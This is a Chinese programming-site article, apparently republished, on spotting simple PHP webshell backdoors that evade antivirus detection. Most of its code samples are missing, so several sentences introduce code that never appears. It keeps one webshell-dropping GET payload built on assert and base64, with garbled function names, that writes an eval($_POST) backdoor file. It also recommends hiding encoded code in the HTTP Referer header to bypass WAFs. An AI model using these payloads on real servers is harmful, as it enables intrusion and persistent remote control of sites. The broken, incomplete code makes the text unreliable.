位置: 编程技术 - 正文
教你识别简单的免查杀PHP后门(怎样识别?)
编辑:rootadmin推荐整理分享教你识别简单的免查杀PHP后门(怎样识别?),希望有所帮助,仅作参考,欢迎阅读内容。
文章相关热门搜索词:教我怎么识别,简易识别方法,教我怎么识别,怎样识别?,教你识别简单的英语,识别技巧,教你识别简单的汉字,教你识别简单的汉字,内容如对您有帮助,希望把文章链接给更多的朋友!
一个最常见的一句话后门可能写作这样
或这样
tudouya 同学在FREEBUF上给出[一种构造技巧]利用
构造生成,当然,嫌太直观可以写作这样
然后再填充些普通代码进行伪装,一个简单的”免杀”shell样本就出现了
我们再来看看号称史上最简单免查杀php后门
直接上代码:
其实现原理就是PHP会直接将 ` 符号(注意:不是单引号)包含的内容解析为系统命令执行!这样就可以自由变态地扩展了!
再来看同样很简单的一段代码
密码page
近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。
Webshell代码如下:
关键看下面这句代码,
这里执行之后其实是一张图片,解密出来的图片地址如下:
仅用GET函数就构成了木马;利用方法: &#;a=assert&b=${fputs%fopen%base_decode%Yy5waHA%,w%,base_decode%PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%%};
执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。层级请求,编码运行PHP后门: 此方法用两个文件实现,文件1
文件2
通过HTTP请求中的HTTP_REFERER来运行经过base编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。
整理php防注入和XSS攻击通用过滤 对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags
PHP概率计算函数汇总 其实发这篇博感觉并没有什么用,太简单了,会的人不屑看,不会的人自已动动脑子也想到了。但是看着自已的博客已经这么久没更,真心疼~。粗略算
php上传功能集后缀名判断和随机命名(强力推荐) 不废话了,具体请看下文代码示例讲解。form.phphtmlheadmetahttp-equiv="content-type"content="text/html"charset="utf-8"titleUploadImage/title/headbodyformmethod="post"action="upload.php"
标签: 怎样识别?
本文链接地址:https://www.jiuchutong.com/biancheng/284218.html 转载请保留说明!
